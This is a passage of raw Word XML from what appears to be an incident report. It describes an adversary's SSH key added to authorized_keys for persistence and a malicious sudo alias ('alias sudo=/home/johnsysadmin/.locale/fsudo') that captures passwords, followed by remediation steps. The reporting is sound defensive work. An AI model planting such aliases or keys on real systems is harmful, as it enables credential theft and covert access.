              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> public key to user eliseo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="62767EED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BB8D2E9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1EB7B60" w14:textId="764DC53B">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="C00000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="1CD4FD82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1306AA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33BA4DE" w14:textId="237B101A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4B685215">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="3F3D8A29" w:rsidP="57C4D39E" w:rsidRDefault="3F3D8A29" w14:paraId="25CE8A83" w14:textId="70290152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3F3D8A29">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="3F3D8A29" w:rsidP="57C4D39E" w:rsidRDefault="3F3D8A29" w14:paraId="07BFCAE3" w14:textId="461FC5F2">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="3F3D8A29">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>/home/eliseo/.ssh/id_rsa.public.key)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="1ABB470D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DC3E4B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55AFEC20" w14:textId="5240C9B6">
            <w:pPr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https://attack.mitre.org/techniques/T1098/004/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="0F9EE365" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="057D635E" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6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04594DAE" w14:textId="39E026C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash history located at </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>/home/eliseo/.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bash_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows a successful attempt to maintain persistence on a victim host with downloaded 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id_rsa.public.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from adversary source. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="22F202D3" w14:textId="76A71FCB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="5019BDB6">
        <w:drawing>
          <wp:inline wp14:editId="4A63E777" wp14:anchorId="763B13FA">
            <wp:extent cx="5391150" cy="1219200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="687288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c70d61495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C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Downloaded 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id_rsa.public.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are placed under </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>/home/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eliseo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>/.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ssh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>/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authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to maintain persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="50C4E24B" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6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6FE397B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44F1445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FA95C1E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0C88B3BB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B097E0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703E5AD" w14:textId="279F23E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44103E68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AB957AF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EA49DFD" w14:textId="751742C8">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:color w:val="auto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</w:rPr>
              <w:t xml:space="preserve"> Remove adversary</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1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id_rsa.public.key</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> from the </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>/home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>eliseo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>id_rsa.public.key</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="6FFB62E8" w14:textId="2E8D270A">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="0CA8EA8D" w14:textId="46FDE3F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2:</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> Restrict access to the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>authorized_key</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="49094C2D" w14:textId="2352054B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="5AA6D1A4" w14:textId="4CFAC77F">
      <w:pPr>
        <w:pStyle w:val="Finding"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Unix Configuration Modification, malicious alias – 13.40.34.151 (Critical)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="217CBACD" w14:textId="77777777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61EA49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69C95CE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Description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FB2816E" w14:textId="2858B577">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:i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 xml:space="preserve">Malicious </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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alias that steals user passwo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rd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="66B8BA3F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DBCF8E4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1E53CE1" w14:textId="1BBD48DA">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="C00000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="76B002C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0DBC042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System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8E62F8D" w14:textId="1E907D9A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4226B0C3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4AC7B20" w14:textId="6189BCF4">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="0"/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Location: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855A30C" w14:textId="606F0D8E">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
            </w:pP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/home/johnsysadmin/.profile/fsudo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="31DAE4F2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F40B2F7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References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06CDCC11" w14:textId="28C2CDE0">
            <w:pPr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https://attack.mitre.org/techniques/T1546/004/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="3CFD80CC" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="1E9F552E" w14:textId="73F94658">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6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770BD420" w14:textId="71F591F1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5019BDB6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User 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johnsysadmin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5019BDB6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>has</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> complete 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sudo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5019BDB6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">privileges. At the same time, attackers created a malicious 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fsudo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5019BDB6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">script in </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>johnsysadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>/.profile</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="0B586661" w14:textId="6E546FC3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="5019BDB6">
        <w:drawing>
          <wp:inline wp14:editId="261CE7EB" wp14:anchorId="1DA2AAE1">
            <wp:extent cx="4572000" cy="990600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1414117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bb548bb44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33BB5D18" w14:textId="19AE61BC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="5019BDB6">
        <w:rPr/>
        <w:t xml:space="preserve">The script steals user password and saves it to </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>pass.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file. The reason this script is ran when executing </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command is because of malicious alias in </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>/home/johnsysadmin/</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>bashrc</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="5797A132" w14:textId="5E2003E1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>alias sudo=/home/johnsysadmin/.locale/fsudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="2207EF5E" w14:textId="4CD56C78">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="7D60854D" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5019BDB6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68B8E22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2A63B03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Who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2C38385">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1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 xml:space="preserve">IT </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="7174A6C1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2F809C6">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/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94C751C" w14:textId="537D003C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Remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="7849824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6398AD7" w14:textId="0538796E">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0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8C63B12" w14:textId="14CF4A71">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:i w:val="0"/>
                <w:i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>R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emove malicious alias from </w:t>
            </w:r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>/home/johnsysadmin/</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>bashrc</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> file.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:noSpellErr="1" w14:paraId="6AAC3948" w14:textId="594A3D91">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="7D48A566" w14:textId="4A42AA8E">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:i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2: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</w:rPr>
              <w:t xml:space="preserve">Consider limiting </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>sudo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 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access even for admin users. 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 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="45F54040" w14:textId="40243423">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="2D2ED666" w14:textId="4ABA45A2">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t>Item 3: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Restrict</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 sensitive file and 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direct</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="3624B035">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t>o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ry</w:t>
            </w:r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permissions</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
